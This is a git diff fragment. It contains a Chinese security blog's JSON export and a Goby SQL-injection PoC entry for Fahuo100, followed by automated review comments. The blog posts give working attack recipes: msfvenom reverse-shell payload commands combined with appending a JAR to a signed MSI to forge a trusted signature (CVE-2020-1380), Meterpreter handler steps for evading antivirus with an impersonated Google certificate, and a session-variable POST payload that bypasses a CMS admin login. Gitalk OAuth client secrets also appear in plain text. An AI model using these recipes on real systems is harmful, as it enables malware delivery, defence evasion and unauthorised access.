gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"CVE-2020-1380签名伪造","slug":"CVE-2020-1380签名伪造","date":"2020-11-17T10:17:01.000Z","updated":"2021-03-07T13:32:07.379Z","comments":true,"path":"2020/11/17/CVE-2020-1380签名伪造/","link":"","permalink":"http://bo.vuvhz.top/2020/11/17/CVE-2020-1380%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0/","excerpt":"","text":"#CVE-2020-1380签名伪造在之前的文章中,冷逸曾写过一篇《使用CVE-2020-0601进行伪造签名》的文章,里面利用windows其对椭圆曲线的逻辑处理错误,可以为任何程序添加可信的数字签名。而今天介绍的是冷逸另一种更加简单的方法,来添加数字签名,漏洞编号为CVE-2020-1380也称之为GlueBall。利用该漏洞可绕过安全特征,不正确地加载已签名文件。在攻击场景中,攻击者能够绕过旨在阻止加载不正确签名文件的安全特征。我们来看一下这个漏洞,众所周知,在以管理员权限运行时,windows会弹出uac的提示,而拥有数字签名的程序触发uac时,为蓝色. 非数字签名的为黄色 而众所周知比较常用的数字签名伪造工具sigthief是可以进行签名伪造的,该工具伪造的签名在国内的一些在线测试平台上会显示签名正常,而在VT则会显示无效签名,在系统中也会显示签名无效. 而利用该漏洞签名的文件,则会显示正常. 注:VT已针对该漏洞进行更新,VT可成功检测该漏洞攻击,会显示invaild-signature 下面即对该漏洞进行复现,该漏洞的复现过程很简单,准备一个带有数字签名的msi文件,一个恶意的jar文件(可msf生成),然后合成即可,思路如下. 
msfvenom -p java/meterpreter/reverse_https LHOST= LPORT= -f jar -o xxx.jar 然后制作文件 copy /b xxx.msi + xxx.jar xxx.jar 成功获取session。其余java编写文件都可以使用该方法进行制作,注:只能为java文件 导致该漏洞的原因为当 Windows 读取 MSI 文件时,它会从文件开头开始读取,一直到有效的 MSI 签名末尾结束并舍弃其它部分。因此在检测到合法的 MSI 文件结构后,它会忽略被附加的数据,而不管它是什么。而JAR 文件只不过是 ZIP 文件,并且在执行时由 Java 运行时从文件末尾开始读取,直到检测到有效 ZIP 文件结构的开头为止,然后它将丢弃文件的其余部分。这最后将造成indows 开始从开头读取而 JAVA 从末尾读取时,windows认为其是一个签名文件,而java文件也可以正常运行。 现windows已更新了相关补丁,主要为msisip.dll该文件,加入了NeedFileSizeVerification和VerifyFileSize两个逻辑,更新系统即可防止该类攻击。 参考文章:https://blog.csdn.net/smellycat000/article/details/108091187https://www.secrss.com/articles/24763https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/https://www.chainnews.com/zh-hant/articles/041869869233.htmhttps://wwws.nightwatchcybersecurity.com/2019/01/16/thoughts-on-the-msi-jar-authenticode-bypass/ var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"httpsms","slug":"httpsms","date":"2020-11-17T10:00:38.000Z","updated":"2021-03-07T13:32:33.655Z","comments":true,"path":"2020/11/17/httpsms/","link":"","permalink":"http://bo.vuvhz.top/2020/11/17/httpsms/","excerpt":"","text":"#https证书绕过杀软msf生成证书(要能连上google,用俺vps来搞)use auxiliary/gather/impersonate_ssl set RHOST www.google.com run生成msf攻击载荷:msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.226.136 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=/root/www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f py -o pentestlab.py然后msf监听: use exploit/multi/handler set payload windows/meterpreter/reverse_winhttps set LHOST 192.168.226.136 set LPORT 443 set 
HandlerSSLCert /root/www.google.com.pem (设置证书) set StagerVerifySSLCert true exploit -j 然后在win7上运行这个pentestlab.py 360杀毒,安全卫士无反应。 全自动工具:https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL 参考:https://pentestlab.blog/category/defense-evasion/ var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"cms","slug":"cms漏洞","date":"2020-11-17T09:36:28.000Z","updated":"2021-03-07T13:31:53.691Z","comments":true,"path":"2020/11/17/cms漏洞/","link":"","permalink":"http://bo.vuvhz.top/2020/11/17/cms%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"#cms后台登录绕过@miko 1.随便打开一个index.php,然后发送post请求,创建seions.POST:_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=99999999999此时就成功地创建了SESION变量.2.创建完成后,登录后台.3.成功! var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"about","slug":"about","date":"2020-11-17T09:27:45.000Z","updated":"2021-03-07T13:31:45.419Z","comments":true,"path":"2020/11/17/about/","link":"","permalink":"http://bo.vuvhz.top/2020/11/17/about/","excerpt":"","text":"#I’m miko魔域魂窟是我的github博客. 你可以在这里学到东西. 
var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]}],"categories":[],"tags":[]} \ No newline at end of file diff --git a/json/fahuo100_sql_injection_CNVD_2021_30193.json b/json/fahuo100_sql_injection_CNVD_2021_30193.json index cd9bc54..a5b837e 100644 --- a/json/fahuo100_sql_injection_CNVD_2021_30193.json +++ b/json/fahuo100_sql_injection_CNVD_2021_30193.json @@ -1,19 +1,25 @@ { - "Name": "fahuo100_sql_injection_CNVD_2021_30193", - "Level": "3", + "Name": "Fahuo100 SQL Injection CNVD-2021-30193", + "Level": "2", "Tags": [ "SQL Injection" ], "GobyQuery": "header=\"Cache-Control: no-store, no-cache\"", - "Description": "发货100 M_id参数存在SQL注入漏洞, 攻击者通过漏洞可以获取数据库敏感信息", - "Product": "发货100", + "Description": "Fahuo100 virtual goods automatic delivery system is a powerful virtual goods automatic delivery system/article paid reading system.", + "Product": "Fahuo100", "Homepage": "https://www.fahuo100.cn/", - "Author": "gobysec@gmail.com", - "Impact": "", - "Recommandation": "

undefined

", + "Author": "", + "Impact": "Fahuo100 M_id SQL Injection", + "Recommendation": "", "References": [ - "https://gobies.org/" + "https://www.cnvd.org.cn/flaw/show/CNVD-2021-30193" ], + "HasExp": false, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -21,7 +27,7 @@ "method": "GET", "uri": "/?M_id=1'&type=product", "follow_redirect": true, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -48,6 +54,6 @@ "SetVariable": [] } ], - "PostTime": "2021-06-03 22:27:28", - "GobyVersion": "1.8.268" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file
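Review bot: The first hunk renames the key `Recommandation` to `Recommendation` while leaving it empty, so a loader that still reads the misspelled key silently loses the field and the corrected key carries nothing; confirm which spelling the PoC schema expects before relying on the rename. In the same hunk `Description` now describes the product rather than the flaw, the vulnerability is named only in `Impact` as `Fahuo100 M_id SQL Injection`, and `Author` is blanked, which leaves the entry with no remediation guidance at all. A one-line value such as `"Recommendation": "Apply the vendor fix and handle the M_id parameter with parameterized queries server-side."` would make the record actionable for defenders triaging a hit.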
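Review bot: `"header": null` replaces `{}` in the second hunk, changing the field's JSON type from object to null; a consumer that ranges over the header map without a nil check will fail on this entry, so unless the scanner documents null as equivalent to an empty map, `"header": {},` should stay. In the third hunk the real `PostTime` and `GobyVersion` are replaced by `"0000-00-00 00:00:00"` and `"0.0.0"`, which are not a valid timestamp or version and read like export placeholders rather than intentional metadata; either restore the prior values or note in the commit that these fields are ignored. The new `ExpParams: null` in the first hunk raises the same object-versus-null question and deserves the same check.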